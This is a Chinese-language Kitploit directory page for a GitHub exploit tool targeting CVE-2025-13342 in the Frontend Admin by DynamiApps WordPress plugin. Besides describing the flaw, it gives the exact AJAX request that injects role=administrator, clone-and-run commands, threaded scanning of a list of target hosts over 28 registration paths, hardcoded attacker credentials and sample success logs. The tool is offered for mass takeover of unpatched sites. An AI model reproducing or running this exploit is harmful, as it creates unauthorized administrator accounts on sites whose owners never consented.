Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-13342 — Frontend Admin by DynamiApps <= 3.28.20 - 未经身份验证的任意选项更新 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-13342
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubnxploited/cve-2025-13342

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - 未经身份验证的任意选项更新

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - 未认证的任意选项更新

⚡ CVE-2025-13342

Frontend Admin by DynamiApps — 未认证的管理员账户创建

root@kitploit:~
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__

CVE CVSS 插件 认证 Python


◈ 漏洞

发生了什么:
ActionOptions::run() 的保存处理程序在写入 wp_options 之前既未检查用户能力,也未验证输入。一个公开的ACF前端表单成为了开放的写入通道。攻击者设置 users_can_register=1 和 default_role=administrator,然后注册一个新账户,该账户会自动获得管理员角色。

此工具跳过了两步法 — 它直接提交了精心构造的表单载荷,通过 acff[user][field_*] 将 role=administrator 注入用户创建字段,在一次AJAX调用中直接创建管理员账户。


◈ 漏洞利用工作原理

root@kitploit:~
1. 爬取常见注册路径  →  定位ACF前端表单
2. 解析隐藏字段       →  _acf_nonce, _acf_form
3. 映射用户字段       →  用户名 · 邮箱 · 密码 · 角色
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][<角色字段>] = administrator
5. {"success":true}  →  管理员账户创建成功
6. 写入 acf_success.txt

◈ 依赖

root@kitploit:~
requests
beautifulsoup4
colorama
rich
root@kitploit:~
pip install requests beautifulsoup4 colorama rich

◈ 安装与运行

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py

◈ 使用方法

工具为交互式。您将被询问四个问题:

root@kitploit:~
目标文件路径    →  list.txt
线程数          →  10
超时(秒)      →  10
详细调试        →  y / N

凭据已在内部固定:

字段值
用户名Nxadmin1
邮箱[email protected]
密码NxAdmin_1337#KSA

◈ 目标文件

每行一个主机 — 协议可选:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

◈ 扫描的注册路径

该工具按顺序探测每个目标的 28 个路径,在找到第一个有效ACF表单时停止:

root@kitploit:~
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...

◈ 输出

文件内容
acf_success.txt确认成功的管理员账户创建

格式:

root@kitploit:~
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}

终端:

root@kitploit:~
[+] 目标基础URL:  https://target.com
[+] 在找到表单: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] 成功:  https://target.com

[-] 在 ... 上未找到合适的ACF前端表单
[-] 失败: https://target2.com

◈ 联系方式

作者Nxploited (Khaled Alenazi)
GitHubgithub.com/Nxploited
Telegram@KNxploited

◈ 免责声明

此工具仅用于授权的安全研究和教育目的。
作者对任何未经所有者明确书面许可而针对系统使用本工具的行为概不负责。
未经授权的访问违反CFAA、CMA及全球等效法律,属违法行为。
您需对自己的行为承担全部责任。


© 2025 Nxploited · Frontend Admin by DynamiApps ≤ 3.28.20 · 已在3.28.21版本中修复
下载工具
字段详情
CVE IDCVE-2025-13342
评分9.8 严重 — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
影响范围Frontend Admin by DynamiApps ≤ 3.28.20
认证无 — 完全未认证
类型能力检查不足 + 输入验证缺陷 → 任意选项写入
CWECWE-284 · 不当访问控制